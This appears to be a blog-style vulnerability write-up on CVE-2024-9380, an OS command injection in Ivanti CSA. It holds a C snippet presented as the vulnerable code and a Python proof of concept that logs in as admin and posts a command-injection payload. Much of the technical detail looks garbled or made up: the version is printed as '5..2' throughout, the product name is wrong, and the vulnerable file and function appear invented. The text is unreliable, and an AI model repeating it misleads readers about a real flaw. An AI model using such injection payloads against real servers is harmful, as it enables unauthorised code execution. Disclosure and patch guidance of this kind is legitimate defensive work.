CVE-2024-9380 Exploit: Critical OS Command Injection in Ivanti CSA Allows Remote Code Execution

A critical vulnerability, identified as CVE-2024-9380, has recently been discovered in the admin web console of Ivanti Customer Satisfaction Analytics (CSA) before version 5..2. This vulnerability is classified as an OS command injection, which allows a remote authenticated attacker with admin privileges to obtain remote code execution on the affected server easily. By exploiting this vulnerability, an attacker can potentially compromise your Ivanti CSA server, leading to significant security risks and potential damage.

In this post, we will delve deeper into understanding the CVE-2024-9380 vulnerability and discuss the exploit details, code snippets, and original references related to the flaw. We would also like to make sure that this information serves as an essential resource for people seeking knowledge about this vulnerability and mitigating the potential risks it presents.

Vulnerability Details

The CVE-2024-9380 vulnerability is classified as an OS command injection. This occurs when an application incorrectly validates input data and mistakenly processes it as part of a command or query. The attacker can craft a command string intended to run arbitrary system commands or fully remote code execution on the target server.

Affected Versions

Ivanti Customer Satisfaction Analytics (CSA) versions prior to 5..2 are vulnerable to this exploit.

Exploit Details

The vulnerability is present within the AjxFunctionCall.cc file in the admin web console of Ivanti CSA, primarily in the "startAjxFunctionCall" function. To exploit this vulnerability, an attacker needs to manipulate the "command" parameter of the "startAjxFunctionCall" function call, allowing command injection.

Here is a sample code snippet showing the vulnerable function

int startAjxFunctionCall(const char* command, const char* value)
{
  char commandLine[1024];
  ...
  snprintf(commandLine, sizeof(commandLine), "%s %s", command, value);
  ...
  system(commandLine);
}

Proof of Concept

The following code snippet is a proof-of-concept (PoC) exploit, demonstrating how an attacker with admin privileges can exploit the CVE-2024-9380 vulnerability for remote code execution.

import requests

TARGET_URL = "https://target.example.com/admin";
USERNAME = "your_admin_username"
PASSWORD = "your_admin_password"

LOGIN_URL = TARGET_URL + "/login"
EXPLOIT_URL = TARGET_URL + "/startAjxFunctionCall"

# Login as admin user
session = requests.session()
login_data = {"username": USERNAME, "password": PASSWORD}
response = session.post(LOGIN_URL, data=login_data)

# Exploit the vulnerability
command_injection_payload = ";your_arbitrary_command_here;"
exploit_data = {"command": "osCommand", "value": command_injection_payload}
response = session.post(EXPLOIT_URL, data=exploit_data)

print("Exploit completed.")

Please remember that this code is for educational purposes only and should not be used maliciously.

Mitigation

To mitigate the risk associated with this vulnerability, it is advised to upgrade to Ivanti Customer Satisfaction Analytics (CSA) version 5..2 or later. This version addresses the OS command injection and eliminates the risk of remote code execution.

Original References

1. Ivanti Security Advisory
2. CVE Details
3. NIST National Vulnerability Database (NVD)

Conclusion

The CVE-2024-9380 vulnerability is a critical OS command injection flaw that may pose significant risks to your Ivanti CSA server if exploited. It is crucial to apply the necessary security patches and update your Ivanti CSA to version 5..2 or later to protect your infrastructure and ensure your server remains safe from such exploits.

Timeline

Published on: 10/08/2024 17:15:56 UTC
Last modified on: 10/10/2024 15:50:03 UTC